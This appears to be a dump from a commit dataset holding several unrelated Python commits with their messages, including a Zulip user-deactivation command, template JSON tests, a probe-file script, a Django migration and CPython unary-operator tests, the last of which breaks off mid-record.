ickles/zulip,itnihao/zulip,nicholasbs/zulip,niftynei/zulip,noroot/zulip,Vallher/zulip,sonali0901/zulip,avastu/zulip,jerryge/zulip,souravbadami/zulip,ashwinirudrappa/zulip,zofuthan/zulip,udxxabp/zulip,TigorC/zulip,RobotCaleb/zulip,hafeez3000/zulip,babbage/zulip,peiwei/zulip,codeKonami/zulip,kou/zulip,vikas-parashar/zulip,karamcnair/zulip,ericzhou2008/zulip,dxq-git/zulip,vakila/zulip,blaze225/zulip,Galexrt/zulip,tbutter/zulip,shaunstanislaus/zulip,jimmy54/zulip,itnihao/zulip,schatt/zulip,yuvipanda/zulip,adnanh/zulip,voidException/zulip,vabs22/zulip,babbage/zulip,eastlhu/zulip,sonali0901/zulip,gigawhitlocks/zulip,xuxiao/zulip,Gabriel0402/zulip,zhaoweigg/zulip,zacps/zulip,avastu/zulip,moria/zulip,natanovia/zulip,firstblade/zulip,voidException/zulip,samatdav/zulip,mohsenSy/zulip,kaiyuanheshang/zulip,MayB/zulip,jainayush975/zulip,kou/zulip,aps-sids/zulip,developerfm/zulip,shrikrishnaholla/zulip,gigawhitlocks/zulip,deer-hope/zulip,amanharitsh123/zulip,MariaFaBella85/zulip,AZtheAsian/zulip,gigawhitlocks/zulip,Qgap/zulip,samatdav/zulip,hayderimran7/zulip,MayB/zulip,wweiradio/zulip,tiansiyuan/zulip,dxq-git/zulip,alliejones/zulip,sharmaeklavya2/zulip,christi3k/zulip,verma-varsha/zulip,alliejones/zulip,glovebx/zulip,dotcool/zulip,DazWorrall/zulip,dattatreya303/zulip,karamcnair/zulip,johnnygaddarr/zulip,LAndreas/zulip,pradiptad/zulip,Batterfii/zulip,Qgap/zulip,dotcool/zulip,Jianchun1/zulip,akuseru/zulip,hj3938/zulip,guiquanz/zulip,hayderimran7/zulip,jonesgithub/zulip,shaunstanislaus/zulip,jrowan/zulip,andersk/zulip,jeffcao/zulip,Gabriel0402/zulip,schatt/zulip,jonesgithub/zulip,susansls/zulip,kaiyuanheshang/zulip,SmartPeople/zulip,MayB/zulip,codeKonami/zulip,suxinde2009/zulip,andersk/zulip,esander91/zulip,zorojean/zulip,xuanhan863/zulip,ipernet/zulip,PhilSk/zulip,grave-w-grave/zulip,Jianchun1/zulip,bowlofstew/zulip,zofuthan/zulip,tiansiyuan/zulip,amallia/zulip,synicalsyntax/zulip,dxq-git/zulip,udxxabp/zulip,LAndreas/zulip,suxinde2009/zulip,atomic-labs/zulip,christi3k/zulip,dawran6/zulip,gigawhitlocks/zulip,Diptanshu8/zulip,shubhamdhama/zulip,Cheppers/zulip,suxinde2009/zulip,andersk/zulip,dotcool/zulip,rht/zulip,wweiradio/zulip,ikasumiwt/zulip,yocome/zulip,Batterfii/zulip,huangkebo/zulip,johnnygaddarr/zulip,tiansiyuan/zulip,niftynei/zulip,grave-w-grave/zulip,bitemyapp/zulip,udxxabp/zulip,ipernet/zulip,ahmadassaf/zulip,yocome/zulip,dotcool/zulip,dawran6/zulip,SmartPeople/zulip,yuvipanda/zulip,firstblade/zulip,vikas-parashar/zulip,mdavid/zulip,tommyip/zulip,dxq-git/zulip,jerryge/zulip,hengqujushi/zulip,KJin99/zulip,nicholasbs/zulip,johnny9/zulip,pradiptad/zulip,stamhe/zulip,paxapy/zulip,JanzTam/zulip,themass/zulip,thomasboyt/zulip,aps-sids/zulip,Cheppers/zulip,akuseru/zulip,rishig/zulip,dwrpayne/zulip,noroot/zulip,lfranchi/zulip,amanharitsh123/zulip,saitodisse/zulip,christi3k/zulip,brainwane/zulip,praveenaki/zulip,wdaher/zulip,paxapy/zulip,Drooids/zulip,rishig/zulip,hackerkid/zulip,pradiptad/zulip,akuseru/zulip,johnnygaddarr/zulip,arpith/zulip,schatt/zulip,armooo/zulip,hustlzp/zulip,yuvipanda/zulip,Diptanshu8/zulip,mahim97/zulip,arpitpanwar/zulip,hj3938/zulip,ikasumiwt/zulip,yuvipanda/zulip,itnihao/zulip,voidException/zulip,jeffcao/zulip,johnny9/zulip,babbage/zulip,eeshangarg/zulip,jerryge/zulip,jonesgithub/zulip,atomic-labs/zulip,hackerkid/zulip,babbage/zulip,cosmicAsymmetry/zulip,sup95/zulip,arpitpanwar/zulip,nicholasbs/zulip,mahim97/zulip,sonali0901/zulip,wweiradio/zulip,susansls/zulip,m1ssou/zulip,ufosky-server/zulip,kou/zulip,sup95/zulip,arpitpanwar/zulip,moria/zulip,aliceriot/zulip,guiquanz/zulip,zwily/zulip,brockwhittaker/zulip,jeffcao/zulip,deer-hope/zulip,isht3/zulip,jainayush975/zulip,bitemyapp/zulip,stamhe/zulip,RobotCaleb/zulip,yocome/zulip,ryanbackman/zulip,hafeez3000/zulip,vaidap/zulip,ashwinirudrappa/zulip,peguin40/zulip,LeeRisk/zulip,ApsOps/zulip,Cheppers/zulip,souravbadami/zulip,krtkmj/zulip,gkotian/zulip,mahim97/zulip,cosmicAsymmetry/zulip,thomasboyt/zulip,punchagan/zulip,glovebx/zulip,armooo/zulip,proliming/zulip,technicalpickles/zulip,littledogboy/zulip,atomic-labs/zulip,bluesea/zulip,mansilladev/zulip,PaulPetring/zulip,kou/zulip,calvinleenyc/zulip,joyhchen/zulip,natanovia/zulip,jessedhillon/zulip,huangkebo/zulip,m1ssou/zulip,xuanhan863/zulip,grave-w-grave/zulip,rht/zulip,shrikrishnaholla/zulip,jainayush975/zulip,deer-hope/zulip,ericzhou2008/zulip,kokoar/zulip,Jianchun1/zulip,paxapy/zulip,suxinde2009/zulip,peiwei/zulip,amanharitsh123/zulip,tiansiyuan/zulip,suxinde2009/zulip,bastianh/zulip,schatt/zulip,ikasumiwt/zulip,bastianh/zulip,eastlhu/zulip,sup95/zulip,ufosky-server/zulip,mansilladev/zulip,vikas-parashar/zulip,jackrzhang/zulip,KingxBanana/zulip,alliejones/zulip,krtkmj/zulip,DazWorrall/zulip,aps-sids/zulip,vaidap/zulip,verma-varsha/zulip,tbutter/zulip,m1ssou/zulip,tommyip/zulip,arpith/zulip,j831/zulip,vabs22/zulip,MayB/zulip,karamcnair/zulip,andersk/zulip,hengqujushi/zulip,zwily/zulip,reyha/zulip,AZtheAsian/zulip,amyliu345/zulip,jerryge/zulip,jackrzhang/zulip,joshisa/zulip,mdavid/zulip,hj3938/zulip,blaze225/zulip,armooo/zulip,huangkebo/zulip,shubhamdhama/zulip,m1ssou/zulip,Suninus/zulip,Diptanshu8/zulip,qq1012803704/zulip,jphilipsen05/zulip,christi3k/zulip,codeKonami/zulip,synicalsyntax/zulip,calvinleenyc/zulip,isht3/zulip,dnmfarrell/zulip,Jianchun1/zulip,ikasumiwt/zulip,vaidap/zulip,sharmaeklavya2/zulip,Jianchun1/zulip,showell/zulip,wangdeshui/zulip,aakash-cr7/zulip,showell/zulip,bastianh/zulip,firstblade/zulip,hengqujushi/zulip,suxinde2009/zulip,timabbott/zulip,shaunstanislaus/zulip,developerfm/zulip,samatdav/zulip,JPJPJPOPOP/zulip,pradiptad/zulip,bowlofstew/zulip,avastu/zulip,tommyip/zulip,umkay/zulip,dawran6/zulip,DazWorrall/zulip,aliceriot/zulip,glovebx/zulip,dattatreya303/zulip,atomic-labs/zulip,bluesea/zulip,cosmicAsymmetry/zulip,dattatreya303/zulip,seapasulli/zulip,kokoar/zulip,xuxiao/zulip,reyha/zulip,arpith/zulip,Vallher/zulip,synicalsyntax/zulip,zhaoweigg/zulip,hackerkid/zulip,shubhamdhama/zulip,hafeez3000/zulip,aakash-cr7/zulip,Gabriel0402/zulip,jphilipsen05/zulip,Juanvulcano/zulip,m1ssou/zulip,jphilipsen05/zulip,vakila/zulip,aakash-cr7/zulip,hackerkid/zulip,glovebx/zulip,thomasboyt/zulip,wavelets/zulip,christi3k/zulip,vaidap/zulip,johnny9/zulip,fw1121/zulip,voidException/zulip,easyfmxu/zulip,codeKonami/zulip,levixie/zulip,glovebx/zulip,PhilSk/zulip,ryansnowboarder/zulip,dhcrzf/zulip,MariaFaBella85/zulip,sonali0901/zulip,hustlzp/zulip,hayderimran7/zulip,easyfmxu/zulip,dxq-git/zulip,tbutter/zulip,levixie/zulip,firstblade/zulip,zwily/zulip,tdr130/zulip,Jianchun1/zulip,vakila/zulip,zacps/zulip,luyifan/zulip,jimmy54/zulip,itnihao/zulip,kaiyuanheshang/zulip,verma-varsha/zulip,tbutter/zulip,Suninus/zulip,adnanh/zulip,praveenaki/zulip,jrowan/zulip,xuanhan863/zulip,isht3/zulip,akuseru/zulip,mdavid/zulip,m1ssou/zulip,Drooids/zulip,sonali0901/zulip,dhcrzf/zulip,wdaher/zulip,mansilladev/zulip,shaunstanislaus/zulip,rht/zulip,xuxiao/zulip,babbage/zulip,levixie/zulip,bastianh/zulip,peiwei/zulip,moria/zulip,peiwei/zulip,bssrdf/zulip,Batterfii/zulip,tommyip/zulip,LAndreas/zulip,dhcrzf/zulip,EasonYi/zulip,krtkmj/zulip,joyhchen/zulip,alliejones/zulip,joshisa/zulip,shubhamdhama/zulip,babbage/zulip,moria/zulip,niftynei/zulip,akuseru/zulip,verma-varsha/zulip,dnmfarrell/zulip,ipernet/zulip,Batterfii/zulip,peiwei/zulip,j831/zulip,Diptanshu8/zulip,j831/zulip,bssrdf/zulip,wweiradio/zulip,EasonYi/zulip,dawran6/zulip,MariaFaBella85/zulip,dnmfarrell/zulip,eastlhu/zulip,ashwinirudrappa/zulip,udxxabp/zulip,amanharitsh123/zulip,ufosky-server/zulip,mohsenSy/zulip,zorojean/zulip,jerryge/zulip,hafeez3000/zulip,esander91/zulip,niftynei/zulip,tdr130/zulip,gigawhitlocks/zulip,KJin99/zulip,jackrzhang/zulip,hustlzp/zulip,Drooids/zulip,susansls/zulip,wdaher/zulip,vaidap/zulip,ryansnowboarder/zulip,MariaFaBella85/zulip,cosmicAsymmetry/zulip,blaze225/zulip,aps-sids/zulip,umkay/zulip,thomasboyt/zulip,ericzhou2008/zulip,karamcnair/zulip,hj3938/zulip,hustlzp/zulip,saitodisse/zulip,bluesea/zulip,xuxiao/zulip,armooo/zulip,AZtheAsian/zulip,Batterfii/zulip,umkay/zulip,kou/zulip,hustlzp/zulip,peguin40/zulip,willingc/zulip,punchagan/zulip,synicalsyntax/zulip,ryanbackman/zulip,he15his/zulip,Galexrt/zulip,zulip/zulip,samatdav/zulip,sonali0901/zulip,shubhamdhama/zulip,hengqujushi/zulip,JanzTam/zulip,bowlofstew/zulip,mansilladev/zulip,ipernet/zulip,vakila/zulip,ApsOps/zulip,brainwane/zulip,dawran6/zulip,levixie/zulip,arpith/zulip,Vallher/zulip,dattatreya303/zulip,shaunstanislaus/zulip,tdr130/zulip,schatt/zulip,zorojean/zulip,TigorC/zulip,aliceriot/zulip,ApsOps/zulip,jainayush975/zulip,susansls/zulip,AZtheAsian/zulip,lfranchi/zulip,brockwhittaker/zulip,JanzTam/zulip,Batterfii/zulip,sup95/zulip,sharmaeklavya2/zulip,gkotian/zulip,Frouk/zulip,calvinleenyc/zulip,DazWorrall/zulip,dotcool/zulip,PaulPetring/zulip,shrikrishnaholla/zulip,zachallaun/zulip,ApsOps/zulip,tommyip/zulip,vaidap/zulip,sharmaeklavya2/zulip,umkay/zulip,bitemyapp/zulip,calvinleenyc/zulip,guiquanz/zulip,MayB/zulip,Frouk/zulip,RobotCaleb/zulip,dwrpayne/zulip,zhaoweigg/zulip,dhcrzf/zulip,zhaoweigg/zulip,zofuthan/zulip,umkay/zulip,Gabriel0402/zulip,proliming/zulip,Qgap/zulip,avastu/zulip,punchagan/zulip,aliceriot/zulip,guiquanz/zulip,Juanvulcano/zulip,qq1012803704/zulip,JPJPJPOPOP/zulip,luyifan/zulip,niftynei/zulip,adnanh/zulip,developerfm/zulip,praveenaki/zulip,joyhchen/zulip,praveenaki/zulip,dwrpayne/zulip,JanzTam/zulip,littledogboy/zulip,ryansnowboarder/zulip,KingxBanana/zulip,deer-hope/zulip,shaunstanislaus/zulip,dwrpayne/zulip,krtkmj/zulip,zachallaun/zulip,brockwhittaker/zulip,showell/zulip,seapasulli/zulip,vabs22/zulip,TigorC/zulip,wavelets/zulip,verma-varsha/zulip,tbutter/zulip,MayB/zulip,ufosky-server/zulip,adnanh/zulip,SmartPeople/zulip,zacps/zulip,zhaoweigg/zulip,peguin40/zulip,swinghu/zulip,LAndreas/zulip,punchagan/zulip,Juanvulcano/zulip,thomasboyt/zulip,grave-w-grave/zulip,amanharitsh123/zulip,vabs22/zulip,jeffcao/zulip,he15his/zulip,Qgap/zulip,willingc/zulip,zorojean/zulip,jessedhillon/zulip,punchagan/zulip,jerryge/zulip,mansilladev/zulip,seapasulli/zulip,avastu/zulip,stamhe/zulip,aakash-cr7/zulip,dnmfarrell/zulip,EasonYi/zulip,xuxiao/zulip,dotcool/zulip,adnanh/zulip,yocome/zulip,bitemyapp/zulip,rishig/zulip,aliceriot/zulip,brainwane/zulip,zofuthan/zulip,natanovia/zulip
|
Add command to mark users as inactive.
This is useful when testing the sigup workflow, as this script enables you
to run through a MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)
|
from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
<commit_before><commit_msg>Add command to mark users as inactive.
This is useful when testing the sigup workflow, as this script enables you
to run through a MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)<commit_after>
|
from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
Add command to mark users as inactive.
This is useful when testing the sigup workflow, as this script enables you
to run through a MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
<commit_before><commit_msg>Add command to mark users as inactive.
This is useful when testing the sigup workflow, as this script enables you
to run through a MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)<commit_after>from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
|
93f12cfc5a5719b195ca0b714a1b4200964b598b
|
tests/test_valid_json_templates.py
|
tests/test_valid_json_templates.py
|
"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
Add test to validate json of templates
|
Add test to validate json of templates
|
Python
|
apache-2.0
|
gogoair/foremast,gogoair/foremast
|
Add test to validate json of templates
|
"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
<commit_before><commit_msg>Add test to validate json of templates<commit_after>
|
"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
Add test to validate json of templates"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
<commit_before><commit_msg>Add test to validate json of templates<commit_after>"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
|
a9e486aa105076d999bec8320a9486812db8889d
|
scripts/probefile.py
|
scripts/probefile.py
|
#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
Add script to create probes file
|
Add script to create probes file
|
Python
|
mit
|
petebachant/RM2-CACTUS,petebachant/RM2-CACTUS,UNH-CORE/RM2-CACTUS,petebachant/RM2-CACTUS,UNH-CORE/RM2-CACTUS,UNH-CORE/RM2-CACTUS
|
Add script to create probes file
|
#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
<commit_before><commit_msg>Add script to create probes file<commit_after>
|
#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
Add script to create probes file#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
<commit_before><commit_msg>Add script to create probes file<commit_after>#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
|
f03dddf47968c75bcda2b66ac28da0c04b7dc23e
|
gridded/gridded.py
|
gridded/gridded.py
|
class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
def load(cls, nc, *args, **kwargs):
for go in self._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
return go(nc, *args, **kwargs)
|
Add Gridded loader module (to be moved)
|
Add Gridded loader module (to be moved)
|
Python
|
mit
|
pyoceans/gridded
|
Add Gridded loader module (to be moved)
|
class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
def load(cls, nc, *args, **kwargs):
for go in self._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
return go(nc, *args, **kwargs)
|
<commit_before><commit_msg>Add Gridded loader module (to be moved)<commit_after>
|
class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
def load(cls, nc, *args, **kwargs):
for go in self._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
return go(nc, *args, **kwargs)
|
Add Gridded loader module (to be moved)class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
def load(cls, nc, *args, **kwargs):
for go in self._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
return go(nc, *args, **kwargs)
|
<commit_before><commit_msg>Add Gridded loader module (to be moved)<commit_after>class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
def load(cls, nc, *args, **kwargs):
for go in self._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
return go(nc, *args, **kwargs)
|
|
d5ad063e5b893ec852a033636fb3e10401f54bdc
|
nodeconductor/iaas/migrations/0012_make_instance_timestamped_model.py
|
nodeconductor/iaas/migrations/0012_make_instance_timestamped_model.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
Make instance a timestamped model
|
Make instance a timestamped model
|
Python
|
mit
|
opennode/nodeconductor,opennode/nodeconductor,opennode/nodeconductor
|
Make instance a timestamped model
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Make instance a timestamped model<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
Make instance a timestamped model# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Make instance a timestamped model<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
|
5255b69390caa52d7eab096cf95d62bb54fd6dd2
|
Lib/test/test_unary.py
|
Lib/test/test_unary.py
|
"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
Test the unary operator changes to the compiler
|
Test the unary operator changes to the compiler
|
Python
|
mit
|
sk-/python2.7-type-annotator,sk-/python2.7-type-annotator,sk-/python2.7-type-annotator
|
Test the unary operator changes to the compiler
|
"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
